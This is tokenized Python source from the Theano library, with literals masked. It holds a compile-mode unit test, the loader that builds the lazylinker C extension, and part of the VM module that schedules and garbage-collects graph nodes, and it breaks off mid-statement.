<s> """<STR_LIT>""" <EOL> import copy <EOL> import unittest <EOL> import theano <EOL> import theano . tensor as T <EOL> from theano . compile import Mode , ProfileMode <EOL> class T_bunch_of_modes ( unittest . TestCase ) : <EOL> def test1 ( self ) : <EOL> linker_classes_involved = [ ] <EOL> predef_modes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> predef_modes . append ( ProfileMode ( ) ) <EOL> if theano . config . cxx : <EOL> linkers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> linkers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> modes = predef_modes + [ Mode ( linker , '<STR_LIT>' ) for linker in linkers ] <EOL> for mode in modes : <EOL> x = T . matrix ( ) <EOL> y = T . vector ( ) <EOL> f = theano . function ( [ x , y ] , x + y , mode = mode ) <EOL> f ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ] , [ <NUM_LIT:5> , <NUM_LIT:6> ] ) <EOL> linker_classes_involved . append ( f . maker . mode . linker . __class__ ) <EOL> assert <NUM_LIT:5> == len ( set ( linker_classes_involved ) ) <EOL> class T_ProfileMode_WrapLinker ( unittest . TestCase ) : <EOL> def test_1 ( self ) : <EOL> x = T . matrix ( ) <EOL> mode = ProfileMode ( ) <EOL> theano . function ( [ x ] , x * <NUM_LIT:2> , mode = mode ) <EOL> default_mode = theano . compile . mode . get_default_mode ( ) <EOL> modified_mode = default_mode . including ( '<STR_LIT>' ) <EOL> copy . deepcopy ( modified_mode ) <EOL> linker = theano . compile . mode . get_default_mode ( ) . linker <EOL> assert not hasattr ( linker , "<STR_LIT>" ) or linker . fgraph is None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import errno <EOL> import logging <EOL> import os <EOL> from six . moves import reload_module as reload <EOL> import sys <EOL> import warnings <EOL> import theano <EOL> from theano import config <EOL> from theano . gof . compilelock import get_lock , release_lock <EOL> from theano . gof import cmodule <EOL> _logger = logging . getLogger ( '<STR_LIT>' ) <EOL> force_compile = False <EOL> version = <NUM_LIT> <EOL> lazylinker_ext = None <EOL> def try_import ( ) : <EOL> global lazylinker_ext <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ config . compiledir ] <EOL> import lazylinker_ext <EOL> del sys . path [ <NUM_LIT:0> ] <EOL> def try_reload ( ) : <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ config . compiledir ] <EOL> reload ( lazylinker_ext ) <EOL> del sys . path [ <NUM_LIT:0> ] <EOL> try : <EOL> location = os . path . join ( config . compiledir , '<STR_LIT>' ) <EOL> if not os . path . exists ( location ) : <EOL> try : <EOL> os . mkdir ( location ) <EOL> except OSError as e : <EOL> assert e . errno == errno . EEXIST <EOL> assert os . path . isdir ( location ) <EOL> init_file = os . path . join ( location , '<STR_LIT>' ) <EOL> if not os . path . exists ( init_file ) : <EOL> try : <EOL> open ( init_file , '<STR_LIT:w>' ) . close ( ) <EOL> except IOError as e : <EOL> if os . path . exists ( init_file ) : <EOL> pass <EOL> else : <EOL> e . args += ( '<STR_LIT>' % ( location , <EOL> os . path . exists ( location ) ) , ) <EOL> raise <EOL> _need_reload = False <EOL> if force_compile : <EOL> raise ImportError ( ) <EOL> else : <EOL> try_import ( ) <EOL> _need_reload = True <EOL> if version != getattr ( lazylinker_ext , '<STR_LIT>' , None ) : <EOL> raise ImportError ( ) <EOL> except ImportError : <EOL> get_lock ( ) <EOL> try : <EOL> try : <EOL> if force_compile : <EOL> raise ImportError ( ) <EOL> if _need_reload : <EOL> try_reload ( ) <EOL> else : <EOL> try_import ( ) <EOL> _need_reload = True <EOL> if version != getattr ( lazylinker_ext , '<STR_LIT>' , None ) : <EOL> raise ImportError ( ) <EOL> except ImportError : <EOL> if not theano . config . cxx : <EOL> raise <EOL> _logger . info ( "<STR_LIT>" ) <EOL> dirname = '<STR_LIT>' <EOL> cfile = os . path . join ( theano . __path__ [ <NUM_LIT:0> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( cfile ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> code = open ( cfile ) . read ( ) <EOL> loc = os . path . join ( config . compiledir , dirname ) <EOL> if not os . path . exists ( loc ) : <EOL> try : <EOL> os . mkdir ( loc ) <EOL> except OSError as e : <EOL> assert e . errno == errno . EEXIST <EOL> assert os . path . exists ( loc ) <EOL> args = cmodule . GCC_compiler . compile_args ( ) <EOL> cmodule . GCC_compiler . compile_str ( dirname , code , location = loc , <EOL> preargs = args ) <EOL> init_py = os . path . join ( loc , '<STR_LIT>' ) <EOL> open ( init_py , '<STR_LIT:w>' ) . write ( '<STR_LIT>' % version ) <EOL> init_pyc = os . path . join ( loc , '<STR_LIT>' ) <EOL> if os . path . isfile ( init_pyc ) : <EOL> os . remove ( init_pyc ) <EOL> try_import ( ) <EOL> try_reload ( ) <EOL> from lazylinker_ext import lazylinker_ext as lazy_c <EOL> assert ( lazylinker_ext . _version == <EOL> lazy_c . get_version ( ) ) <EOL> _logger . info ( "<STR_LIT>" , lazylinker_ext . _version ) <EOL> finally : <EOL> release_lock ( ) <EOL> from lazylinker_ext . lazylinker_ext import * <EOL> assert force_compile or ( version == get_version ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from . import link <EOL> from collections import defaultdict <EOL> import logging <EOL> import os <EOL> import sys <EOL> import time <EOL> import warnings <EOL> from theano . configparser import ( config , _config_var_list ) <EOL> import theano . gof . cmodule <EOL> from six import iteritems , itervalues <EOL> from six . moves import xrange <EOL> logger = logging . getLogger ( __name__ ) <EOL> def calculate_reallocate_info ( order , fgraph , storage_map , compute_map_re , <EOL> dependencies ) : <EOL> reallocated_info = { } <EOL> viewed_by = { } <EOL> for var in fgraph . variables : <EOL> viewed_by [ var ] = [ ] <EOL> view_of = { } <EOL> pre_allocated = set ( [ ] ) <EOL> allocated = set ( [ ] ) <EOL> for idx in range ( len ( order ) ) : <EOL> node = order [ idx ] <EOL> dmap = getattr ( node . op , '<STR_LIT>' , None ) <EOL> vmap = getattr ( node . op , '<STR_LIT>' , None ) <EOL> idx_o = <NUM_LIT:0> <EOL> for out in node . outputs : <EOL> for var in node . outputs : <EOL> compute_map_re [ var ] [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> ins = None <EOL> if dmap and idx_o in dmap : <EOL> idx_v = dmap [ idx_o ] <EOL> assert len ( idx_v ) == <NUM_LIT:1> , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ins = node . inputs [ idx_v [ <NUM_LIT:0> ] ] <EOL> if vmap and idx_o in vmap : <EOL> assert ins is None <EOL> idx_v = vmap [ idx_o ] <EOL> assert len ( idx_v ) == <NUM_LIT:1> , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ins = node . inputs [ idx_v [ <NUM_LIT:0> ] ] <EOL> if ins is not None : <EOL> assert isinstance ( ins , theano . Variable ) <EOL> origin = view_of . get ( ins , ins ) <EOL> view_of [ out ] = origin <EOL> viewed_by [ origin ] . append ( out ) <EOL> idx_o += <NUM_LIT:1> <EOL> for ins in node . inputs : <EOL> assert not ( ins in view_of and viewed_by [ ins ] ) <EOL> if ( getattr ( ins , '<STR_LIT>' , None ) == <NUM_LIT:0> and not storage_map [ ins ] [ <NUM_LIT:0> ] and <EOL> ins not in fgraph . outputs and ins . owner and <EOL> all ( [ compute_map_re [ v ] [ <NUM_LIT:0> ] <EOL> for v in dependencies . get ( ins , [ ] ) ] ) and <EOL> ins not in allocated ) : <EOL> reuse_out = None <EOL> if ins not in view_of and not viewed_by . get ( ins , [ ] ) : <EOL> for i in range ( idx + <NUM_LIT:1> , len ( order ) ) : <EOL> if reuse_out is not None : <EOL> break <EOL> for out in order [ i ] . outputs : <EOL> if ( getattr ( out , '<STR_LIT>' , None ) == <NUM_LIT:0> and <EOL> out not in pre_allocated and <EOL> ins . type == out . type ) : <EOL> reuse_out = out <EOL> pre_allocated . add ( out ) <EOL> allocated . add ( ins ) <EOL> break <EOL> elif ins in view_of : <EOL> origin = view_of [ ins ] <EOL> if ins in viewed_by [ origin ] : <EOL> viewed_by [ origin ] . remove ( ins ) <EOL> if ( not viewed_by [ origin ] and <EOL> origin not in fgraph . inputs and <EOL> not isinstance ( origin , theano . Constant ) ) : <EOL> for i in range ( idx + <NUM_LIT:1> , len ( order ) ) : <EOL> if reuse_out is not None : <EOL> break <EOL> for out in order [ i ] . outputs : <EOL> if ( getattr ( out , '<STR_LIT>' , None ) == <NUM_LIT:0> and <EOL> out not in pre_allocated and <EOL> ins . type == out . type ) : <EOL> reuse_out = out <EOL> pre_allocated . add ( out ) <EOL> allocated . add ( ins ) <EOL> break <EOL> if reuse_out is not None : <EOL> reallocated_info [ ins ] = [ ins , reuse_out ] <EOL> return reallocated_info <EOL> class VM ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nodes , thunks , pre_call_clear ) : <EOL> if len ( nodes ) != len ( thunks ) : <EOL> raise ValueError ( ) <EOL> self . nodes = nodes <EOL> self . thunks = thunks <EOL> self . pre_call_clear = pre_call_clear <EOL> self . call_counts = [ <NUM_LIT:0> ] * len ( nodes ) <EOL> self . call_times = [ <NUM_LIT:0> ] * len ( nodes ) <EOL> self . time_thunks = False <EOL> self . need_update_inputs = True <EOL> def __call__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def clear_storage ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def update_profile ( self , profile ) : <EOL> for node , thunk , t , c in zip ( self . nodes , self . thunks , <EOL> self . call_times , self . call_counts ) : <EOL> profile . apply_time . setdefault ( node , <NUM_LIT:0.0> ) <EOL> profile . apply_time [ node ] += t <EOL> profile . apply_callcount . setdefault ( node , <NUM_LIT:0> ) <EOL> profile . apply_callcount [ node ] += c <EOL> profile . apply_cimpl [ node ] = hasattr ( thunk , '<STR_LIT>' ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . variable_shape = self . variable_shape . copy ( ) <EOL> profile . variable_strides = self . variable_strides . copy ( ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . node_executed_order = self . node_executed_order [ : ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . node_cleared_order = self . node_cleared_order [ : ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . dependencies = self . dependencies <EOL> for i in xrange ( len ( self . call_times ) ) : <EOL> self . call_times [ i ] = <NUM_LIT:0.0> <EOL> self . call_counts [ i ] = <NUM_LIT:0> <EOL> class Loop ( VM ) : <EOL> """<STR_LIT>""" <EOL> allow_gc = False <EOL> def __call__ ( self ) : <EOL> if self . time_thunks : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> for i , ( thunk , node ) in enumerate ( zip ( self . thunks , <EOL> self . nodes ) ) : <EOL> t0 = time . time ( ) <EOL> thunk ( ) <EOL> t1 = time . time ( ) <EOL> self . call_counts [ i ] += <NUM_LIT:1> <EOL> self . call_times [ i ] += t1 - t0 <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> else : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> for thunk , node in zip ( self . thunks , self . nodes ) : <EOL> thunk ( ) <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> class LoopGC ( VM ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nodes , thunks , pre_call_clear , post_thunk_clear ) : <EOL> super ( LoopGC , self ) . __init__ ( nodes , thunks , pre_call_clear ) <EOL> self . post_thunk_clear = post_thunk_clear <EOL> self . allow_gc = True <EOL> if not ( len ( nodes ) == len ( thunks ) == len ( post_thunk_clear ) ) : <EOL> raise ValueError ( ) <EOL> def __call__ ( self ) : <EOL> if self . time_thunks : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> i = <NUM_LIT:0> <EOL> for thunk , node , old_storage in zip ( self . thunks , <EOL> self . nodes , <EOL> self . post_thunk_clear ) : <EOL> t0 = time . time ( ) <EOL> thunk ( ) <EOL> t1 = time . time ( ) <EOL> self . call_counts [ i ] += <NUM_LIT:1> <EOL> self . call_times [ i ] += t1 - t0 <EOL> for old_s in old_storage : <EOL> old_s [ <NUM_LIT:0> ] = None <EOL> i += <NUM_LIT:1> <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> else : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> for thunk , node , old_storage in zip ( self . thunks , self . nodes , <EOL> self . post_thunk_clear ) : <EOL> thunk ( ) <EOL> for old_s in old_storage : <EOL> old_s [ <NUM_LIT:0> ] = None <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> class Stack ( VM ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nodes , thunks , pre_call_clear , <EOL> storage_map , compute_map , fgraph , allow_gc , <EOL> dependencies = None , callback = None ) : <EOL> super ( Stack , self ) . __init__ ( nodes , thunks , pre_call_clear ) <EOL> self . allow_gc = allow_gc <EOL> self . message = "<STR_LIT>" <EOL> self . base_apply_stack = [ o . owner for o in fgraph . outputs if o . owner ] <EOL> self . outputs = fgraph . outputs <EOL> self . storage_map = storage_map <EOL> self . variable_shape = { } <EOL> self . variable_strides = { } <EOL> self . compute_map = compute_map <EOL> self . node_idx = node_idx = { } <EOL> self . callback = callback <EOL> ords = fgraph . orderings ( ) <EOL> for i , node in enumerate ( self . nodes ) : <EOL> node_idx [ node ] = i <EOL> node . destroy_dependencies = [ ] <EOL> if node in ords : <EOL> for prereq in ords [ node ] : <EOL> node . destroy_dependencies += prereq . outputs <EOL> self . dependencies = dependencies <EOL> if self . allow_gc and self . dependencies is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def run_thunk_of_node ( self , node ) : <EOL> """<STR_LIT>""" <EOL> idx = self . node_idx [ node ] <EOL> t0 = time . time ( ) <EOL> rval = self . thunks [ idx ] ( ) <EOL> self . node_executed_order . append ( node ) <EOL> dt = max ( time . time ( ) - t0 , <NUM_LIT> ) <EOL> if self . callback is not None : <EOL> self . callback ( <EOL> node = node , <EOL> thunk = self . thunks [ idx ] , <EOL> storage_map = self . storage_map , <EOL> compute_map = self . compute_map , <EOL> ) <EOL> return rval , dt <EOL> def __call__ ( self ) : <EOL> storage_map = self . storage_map <EOL> compute_map = self . compute_map <EOL> thunks = self . thunks <EOL> dependencies = self . dependencies <EOL> self . node_executed_order = [ ] <EOL> self . node_cleared_order = [ ] <EOL> for k in self . storage_map : <EOL> compute_map [ k ] [ <NUM_LIT:0> ] = ( k . owner is None ) <EOL> apply_stack = list ( self . base_apply_stack ) <EOL> last_apply_stack_len = - <NUM_LIT:1> <EOL> for var , data in iteritems ( self . storage_map ) : <EOL> if data [ <NUM_LIT:0> ] is None : <EOL> continue <EOL> if hasattr ( var . type , '<STR_LIT>' ) : <EOL> sh = var . type . get_shape_info ( data [ <NUM_LIT:0> ] ) <EOL> else : <EOL> sh = '<STR_LIT>' <EOL> self . variable_shape [ var ] = sh <EOL> st = getattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if getattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) and data [ <NUM_LIT:0> ] . flags . c_contiguous : <EOL> st = '<STR_LIT:c>' <EOL> elif ( hasattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' ) and <EOL> data [ <NUM_LIT:0> ] . is_c_contiguous ( ) ) : <EOL> st = "<STR_LIT:c>" <EOL> self . variable_strides [ var ] = st <EOL> while apply_stack : <EOL> apply_stack_len = len ( apply_stack ) <EOL> assert apply_stack_len != last_apply_stack_len <EOL> last_apply_stack_len = apply_stack_len <EOL> current_apply = apply_stack . pop ( ) <EOL> current_inputs = current_apply . inputs <EOL> current_outputs = current_apply . outputs <EOL> current_deps = current_inputs + current_apply . destroy_dependencies <EOL> computed_ins = all ( compute_map [ v ] [ <NUM_LIT:0> ] for v in current_deps ) <EOL> computed_outs = all ( compute_map [ v ] [ <NUM_LIT:0> ] for v in current_outputs ) <EOL> if not thunks [ self . node_idx [ current_apply ] ] . lazy : <EOL> if computed_ins and not computed_outs : <EOL> try : <EOL> _ , dt = self . run_thunk_of_node ( current_apply ) <EOL> del _ <EOL> if config . profile : <EOL> current_idx = self . node_idx [ current_apply ] <EOL> self . call_counts [ current_idx ] += <NUM_LIT:1> <EOL> self . call_times [ current_idx ] += dt <EOL> for ( idx , o ) in enumerate ( <EOL> thunks [ self . node_idx [ <EOL> current_apply ] ] . outputs ) : <EOL> var = self . nodes [ current_idx ] . outputs [ idx ] <EOL> if hasattr ( var . type , '<STR_LIT>' ) : <EOL> sh = var . type . get_shape_info ( o [ <NUM_LIT:0> ] ) <EOL> else : <EOL> sh = '<STR_LIT>' <EOL> self . variable_shape [ var ] = sh <EOL> st = getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> if ( getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) and <EOL> o [ <NUM_LIT:0> ] . flags . c_contiguous ) : <EOL> st = '<STR_LIT:c>' <EOL> elif ( hasattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' ) and <EOL> data [ <NUM_LIT:0> ] . is_c_contiguous ( ) ) : <EOL> st = "<STR_LIT:c>" <EOL> self . variable_strides [ var ] = st <EOL> except Exception : <EOL> link . raise_with_op ( <EOL> current_apply , <EOL> self . thunks [ self . node_idx [ current_apply ] ] , <EOL> storage_map = storage_map ) <EOL> for o in current_apply . outputs : <EOL> compute_map [ o ] [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> input_index = [ ] <EOL> if self . allow_gc : <EOL> for i in current_apply . inputs : <EOL> if ( dependencies [ i ] and <EOL> i . owner and <EOL> i not in self . outputs ) : <EOL> if all ( compute_map [ v ] [ <NUM_LIT:0> ] <EOL> for v in dependencies [ i ] ) : <EOL> storage_map [ i ] [ <NUM_LIT:0> ] = None <EOL> input_index . append ( <EOL> current_apply . inputs . index ( i ) ) <EOL> compute_map [ i ] [ <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> if ( config . warn . vm_gc_bug and <EOL> current_apply in apply_stack and <EOL> getattr ( current_apply . op , <EOL> '<STR_LIT>' , <EOL> False ) ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> stacklevel = <NUM_LIT:3> <EOL> ) <EOL> self . node_cleared_order . append ( input_index ) <EOL> elif not computed_ins : <EOL> apply_stack . append ( current_apply ) <EOL> apply_stack . extend ( inp . owner <EOL> for inp in current_deps <EOL> if inp . owner ) <EOL> elif not computed_outs : <EOL> try : <EOL> requires , dt = self . run_thunk_of_node ( current_apply ) <EOL> current_idx = self . node_idx [ current_apply ] <EOL> self . call_counts [ current_idx ] += <NUM_LIT:1> <EOL> self . call_times [ current_idx ] += dt <EOL> except Exception : <EOL> link . raise_with_op ( <EOL> current_apply , <EOL> self . thunks [ self . node_idx [ current_apply ] ] , <EOL> storage_map = storage_map ) <EOL> if requires : <EOL> for r in requires : <EOL> apply_stack . append ( current_apply ) <EOL> if current_apply . inputs [ r ] . owner : <EOL> apply_stack . append ( current_apply . inputs [ r ] . owner ) <EOL> else : <EOL> if config . profile : <EOL> for ( idx , o ) in enumerate ( thunks [ <EOL> self . node_idx [ current_apply ] ] . outputs ) : <EOL> var = self . nodes [ <EOL> self . node_idx [ current_apply ] ] . outputs [ idx ] <EOL> if hasattr ( var . type , '<STR_LIT>' ) : <EOL> sh = var . type . get_shape_info ( o [ <NUM_LIT:0> ] ) <EOL> else : <EOL> sh = '<STR_LIT>' <EOL> self . variable_shape [ var ] = sh <EOL> st = getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if ( getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) and <EOL> o [ <NUM_LIT:0> ] . flags . c_contiguous ) : <EOL> st = '<STR_LIT:c>' <EOL> elif ( hasattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' ) and <EOL> data [ <NUM_LIT:0> ] . is_c_contiguous ( ) ) : <EOL> st = "<STR_LIT:c>" <EOL> self . variable_strides [ var ] = st <EOL> input_index = [ ] <EOL> if self . allow_gc : <EOL> for i in current_apply . inputs : <EOL> if ( dependencies [ i ] and i . owner and <EOL> i not in self . outputs ) : <EOL> empty_storage_map = True <EOL> for x in dependencies [ i ] : <EOL> if not compute_map [ x ] [ <NUM_LIT:0> ] : <EOL> empty_storage_map = False <EOL> break <EOL> if empty_storage_map : <EOL> storage_map [ i ] [ <NUM_LIT:0> ] = None <EOL> input_index . append ( <EOL> current_apply . inputs . index ( i ) ) <EOL> compute_map [ i ] [ <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> self . node_cleared_order . append ( input_index ) <EOL> final_index = [ ] <EOL> if self . allow_gc : <EOL> for v in storage_map : <EOL> if v . owner and v not in self . outputs : <EOL> if compute_map [ v ] [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> continue <EOL> else : <EOL> storage_map [ v ] [ <NUM_LIT:0> ] = None <EOL> final_index . append ( v ) <EOL> compute_map [ v ] [ <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> self . node_cleared_order . append ( final_index ) <EOL> try : <EOL> from . import lazylinker_c <EOL> class CVM ( lazylinker_c . CLazyLinker , VM ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> lazylinker_c . CLazyLinker . __init__ ( self , * args , ** kwargs ) <EOL> except ImportError : <EOL> pass <EOL> except ( OSError , theano . gof . cmodule . MissingGXX ) as e : <EOL> assert not [ x for x in _config_var_list <EOL> if x . fullname == '<STR_LIT>' ] [ <NUM_LIT:0> ] . default . startswith ( '<STR_LIT>' ) , e <EOL> pass <EOL> class VM_Linker ( link . LocalLinker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , allow_gc = None , use_cloop = False , callback = None , <EOL> lazy = None , schedule = None , c_thunks = None ) : <EOL> if allow_gc is None : <EOL> allow_gc = config . allow_gc <EOL> self . fgraph = None <EOL> self . allow_gc = allow_gc <EOL> self . use_cloop = use_cloop <EOL> self . callback = callback <EOL> self . lazy = lazy <EOL> self . c_thunks = c_thunks <EOL> self . updated_vars = { } <EOL> if schedule : <EOL> self . schedule = schedule <EOL> def accept ( self , fgraph , no_recycling = None ) : <EOL> """<STR_LIT>""" <EOL> if ( config . profile and <EOL> hasattr ( theano , '<STR_LIT>' ) and <EOL> hasattr ( theano . sandbox , '<STR_LIT>' ) and <EOL> theano . sandbox . cuda . cuda_enabled ) : <EOL> if os . environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) != '<STR_LIT:1>' : <EOL> raise Exception ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if no_recycling is None : <EOL> no_recycling = [ ] <EOL> if self . fgraph is not None and self . fgraph is not fgraph : <EOL> return type ( self ) ( <EOL> allow_gc = self . allow_gc , <EOL> use_cloop = self . use_cloop , <EOL> callback = self . callback , <EOL> lazy = self . lazy , <EOL> schedule = self . schedule , <EOL> c_thunks = self . c_thunks , <EOL> ) . accept ( fgraph , no_recycling ) <EOL> self . fgraph = fgraph <EOL> self . no_recycling = no_recycling <EOL> return self <EOL> def accept_var_updates ( self , updated_vars ) : <EOL> self . updated_vars = updated_vars <EOL> def compute_gc_dependencies ( self , variables ) : <EOL> """<STR_LIT>""" <EOL> dependencies = { } <EOL> for k in variables : <EOL> dependencies [ k ] = [ ] <EOL> if k . owner and k . clients : <EOL> ls = [ ] <EOL> for cl in k . clients : <EOL> if cl [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> ls += cl [ <NUM_LIT:0> ] . outputs <EOL> dependencies [ k ] += ls <EOL> return dependencies <EOL> def make_vm ( self , nodes , thunks , <EOL> input_storage , output_storage , storage_map , <EOL> post_thunk_clear , <EOL> computed , <EOL> compute_map , <EOL> updated_vars , <EOL> ) : <EOL> pre_call_clear = [ storage_map [ v ] for v in self . no_recycling ] <EOL> if ( self . callback is not None or <EOL> ( config . profile and config . profile_memory ) ) : <EOL> if self . use_cloop and self . callback is not None : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> if self . use_cloop and config . profile_memory : <EOL> warnings . warn ( <EOL> '<STR_LIT>' ) <EOL> deps = self . compute_gc_dependencies ( storage_map ) <EOL> vm = Stack ( <EOL> nodes , thunks , pre_call_clear , <EOL> storage_map , compute_map , <EOL> self . fgraph , self . allow_gc , <EOL> dependencies = deps , <EOL> callback = self . callback ) <EOL> elif self . use_cloop : <EOL> nodes_idx = { } <EOL> vars_idx = { } <EOL> for i , node in enumerate ( nodes ) : <EOL> nodes_idx [ node ] = i <EOL> for v in node . inputs + node . outputs : <EOL> vars_idx . setdefault ( v , len ( vars_idx ) ) <EOL> for v in self . fgraph . inputs + self . fgraph . outputs : <EOL> vars_idx . setdefault ( v , len ( vars_idx ) ) <EOL> nodes_idx_inv = { } <EOL> vars_idx_inv = { } <EOL> for ( node , i ) in iteritems ( nodes_idx ) : <EOL> nodes_idx_inv [ i ] = node <EOL> for ( var , i ) in iteritems ( vars_idx ) : <EOL> vars_idx_inv [ i ] = var <EOL> storage_map_list = [ storage_map [ vars_idx_inv [ i ] ] <EOL> for i in xrange ( len ( vars_idx_inv ) ) ] <EOL> compute_map_list = [ compute_map [ vars_idx_inv [ i ] ] <EOL> for i in xrange ( len ( vars_idx_inv ) ) ] <EOL> if nodes : <EOL> assert type ( storage_map_list [ <NUM_LIT:0> ] ) is list <EOL> assert type ( compute_map_list [ <NUM_LIT:0> ] ) is list <EOL> dependency_map = self . compute_gc_dependencies ( storage_map ) <EOL> dependency_map_list = [ <EOL> [ vars_idx [ d ] for d in dependency_map [ vars_idx_inv [ i ] ] ] <EOL> for i in xrange ( len ( vars_idx_inv ) ) ] <EOL> base_input_output_list = [ ] <EOL> node_n_inputs = [ ] <EOL> node_n_outputs = [ ] <EOL> node_input_offset = [ ] <EOL> node_output_offset = [ ] <EOL> for node in nodes : <EOL> inputs_idx = [ vars_idx [ v ] for v in node . inputs ] <EOL> outputs_idx = [ vars_idx [ v ] for v in node . outputs ] <EOL> node_n_inputs . append ( len ( inputs_idx ) ) <EOL> node_n_outputs . append ( len ( outputs_idx ) ) <EOL> node_input_offset . append ( len ( base_input_output_list ) ) <EOL> base_input_output_list . extend ( inputs_idx ) <EOL> node_output_offset . append ( len ( base_input_output_list ) ) <EOL> base_input_output_list . extend ( outputs_idx ) <EOL> var_owner = [ None ] * len ( vars_idx ) <EOL> for ( var , i ) in iteritems ( vars_idx ) : <EOL> if var . owner : <EOL> var_owner [ i ] = nodes_idx [ var . owner ] <EOL> is_lazy_list = [ int ( th . lazy ) for th in thunks ] <EOL> output_vars = [ vars_idx [ v ] for v in self . fgraph . outputs ] <EOL> ords = self . fgraph . orderings ( ) <EOL> node_prereqs = [ ] <EOL> node_output_size = [ ] <EOL> for i , node in enumerate ( nodes ) : <EOL> node_output_size . append ( <NUM_LIT:0> ) <EOL> prereq_var_idxs = [ ] <EOL> for prereq_node in ords . get ( node , [ ] ) : <EOL> prereq_var_idxs . extend ( <EOL> [ vars_idx [ v ] for v in prereq_node . outputs ] ) <EOL> prereq_var_idxs = list ( set ( prereq_var_idxs ) ) <EOL> prereq_var_idxs . sort ( ) <EOL> node_prereqs . append ( prereq_var_idxs ) <EOL> update_storage = [ ] <EOL> update_in_from_out = { } <EOL> for ( ivar , ovar ) in iteritems ( updated_vars ) : <EOL> update_in_from_out [ vars_idx [ ovar ] ] = vars_idx [ ivar ] <EOL> for oidx in output_vars : <EOL> if oidx in update_in_from_out : <EOL> update_storage . append ( update_in_from_out [ oidx ] ) <EOL> c0 = sys . getrefcount ( node_n_inputs ) <EOL> vm = CVM ( <EOL> nodes , <EOL> thunks , <EOL> pre_call_clear , <EOL> allow_gc = self . allow_gc , <EOL> call_counts = [ <NUM_LIT:0> ] * len ( nodes ) , <EOL> call_times = [ <NUM_LIT:0.0> ] * len ( nodes ) , <EOL> compute_map_list = compute_map_list , <EOL> storage_map_list = storage_map_list , <EOL> base_input_output_list = base_input_output_list , <EOL> node_n_inputs = node_n_inputs , <EOL> node_n_outputs = node_n_outputs , <EOL> node_input_offset = node_input_offset , <EOL> node_output_offset = node_output_offset , <EOL> var_owner = var_owner , <EOL> is_lazy_list = is_lazy_list , <EOL> output_vars = output_vars , <EOL> node_prereqs = node_prereqs , <EOL> node_output_size = node_output_size , <EOL> update_storage = update_storage , <EOL> dependencies = dependency_map_list , <EOL> ) <EOL> assert c0 == sys . getrefcount ( node_n_inputs ) <EOL> else : <EOL> lazy = self . lazy <EOL> if 